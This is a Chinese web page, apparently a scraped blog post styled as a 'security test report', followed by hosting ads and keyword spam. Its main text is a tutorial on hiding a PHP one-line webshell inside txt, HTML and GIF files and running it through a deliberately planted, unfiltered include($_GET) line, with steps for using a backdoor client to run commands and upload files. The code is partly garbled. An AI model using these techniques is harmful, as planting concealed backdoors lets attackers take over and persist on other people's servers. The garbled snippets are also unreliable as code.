文件网站安全测试报告

网站安全测试  时间:2021-02-14  阅读:()

网站安全测试报告

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里其实把一句话木马插入到PHP文件中就已经很隐蔽了如果说硬是要放到HTML文件或图片里就接着往下看这篇的篇测试报告吧。要知道如果光把P HP语句放到图片里是无论如何也不能执行的 因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 include、 require等。

我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。 ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。 由于URL里用GET方式很难传递参数这就使得插入木马的性能得不到发挥。

Include函数在PHP中使用的比较频繁所以引起的安全问题也实在太多例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。 由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句

‘’?@includeinclud/.$PHPWIND_ROOT;?一般管理员是无法看出来的。

有了include函数来辅助帮忙我们就可以把PH P木马隐藏到诸如txt、 html和图片文件等很多类型的文件里来了。 因为txt、 html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了下面我们就依次来做测试。

首先建立一PHP文件test.php文件内容为:

$test=$_GET[''' 'test'' ' '];

@include' ' ''test/' ''' .$test;

?

Txt文件一般都是说明文件所以我们把一句话木马放到目录的说明文件里就O K了。随便建立一个TX T文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问

//localhost/test/test.php?test=. ./t.txt如果你看到t.txt的内容就证明Ok了然后把在lanker微型PHP后门客户端木马地址添入//localhost/test/test.php?test=. ./t.txt密码里添入cmd就可以了执行返回的结果都可以看到。

对于HTML的文件一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来我们可以在HTML里加入一个隐藏属性的文本框如然后使用方法同上。执行的返回结果一般都可以查看源文件看到。如使用查看本程序目录功能。查看源文件内容为我可以得到目录为C:\Uniserver2_7s\www\test。

下面我们说说图片文件要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑把插入到图片末尾

经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入

我们查看P HP环境变量返回的是结果是原图片。

这里可能要和我们想象的结果有些差距了其实命令已经运行了只是返回的结果看不到而已 因为这是真正的GIF文件所以是不会显示返回结果的 为了证明是否真的执行了命令我们执行上传文件命令。果不出所料文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果那就拿出记事本伪造一个假的图片文件吧。

到这里就基本测试完了 怎样隐蔽PHP后门就看你自己的选择了。行文仓促如有不妥之处请指出!

华圣云 HuaSaint-阿里云国际站一级分销商,只需一个邮箱即可注册国际账号,可代充值

简介华圣云 HuaSaint是阿里云国际版一级分销商(诚招募二级代理),专业为全球企业客户与个人开发者提供阿里云国际版开户注册、认证、充值等服务,通过HuaSaint开通阿里云国际版只需要一个邮箱,不需要PayPal信用卡,不需要买海外电话卡,绝对的零门槛,零风险官方网站:www.huasaint.com企业名:huaSaint Tech Limited阿里云国际版都有什么优势?阿里云国际版的产品...

Sharktech鲨鱼服务器商提供洛杉矶独立服务器促销 不限流量月99美元

Sharktech(鲨鱼服务器商)我们还是比较懂的,有提供独立服务器和高防服务器,而且性价比都还算是不错,而且我们看到有一些主机商的服务器也是走这个商家渠道分销的。这不看到鲨鱼服务器商家洛杉矶独立服务器纷纷促销,不限制流量的独立服务器起步99美元,这个还未曾有过。第一、鲨鱼机房服务器方案洛杉矶机房,默认1Gbps带宽,不限流量,自带5个IPv4,免费60Gbps / 48Mpps DDoS防御。C...

RackNerd美国大硬盘服务器促销:120G SSD+192TB HDD,1Gbps大带宽,月付$599,促销美国月付$服务器促销带宽

racknerd怎么样?racknerd最近发布了一些便宜美国服务器促销,包括大硬盘服务器,提供120G SSD+192TB HDD,有AMD和Intel两个选择,默认32G内存,1Gbps带宽,每个月100TB流量,5个IP地址,月付$599。价格非常便宜,需要存储服务器的朋友可以关注一下。RackNerd主要经营美国圣何塞、洛杉矶、达拉斯、芝加哥、亚特兰大、新泽西机房基于KVM虚拟化的VPS、...

网站安全测试为你推荐
网页解密急急急~~谁知道怎么让所有的网页都设密码?以及破解的办法啊? 谢谢了谁帮帮我啊外网和内网外网和内网的区别无线路由器限速设置无线路由器怎么设置限速无线路由器限速设置如何设置无线路由器局域网限速?彩信中心移动的彩信中心是?主页是?收不到彩信,怎么设置?ios7固件下载iOS的固件有正版盗版之分吗?我看到了蜂威网有iOS7的固件想下载试用一下,那里是测试版是正版吗xv播放器下载迅雷看看下载的XV格式的电影用什么播放器可以播放?(没有互联网的情况下)宕机何谓宕机?iphone6上市时间苹果6什么时候出?多少钱网管工具网吧管理软件都有哪些?
域名服务商 景安vps 免费申请网站域名 花生壳域名贝锐 免费申请网页 singlehop locvps 秒解服务器 gitcafe 阿里云代金券 地址大全 台湾谷歌网址 创梦 100m空间 hostloc idc是什么 web服务器是什么 下载速度测试 智能dns解析 asp空间 更多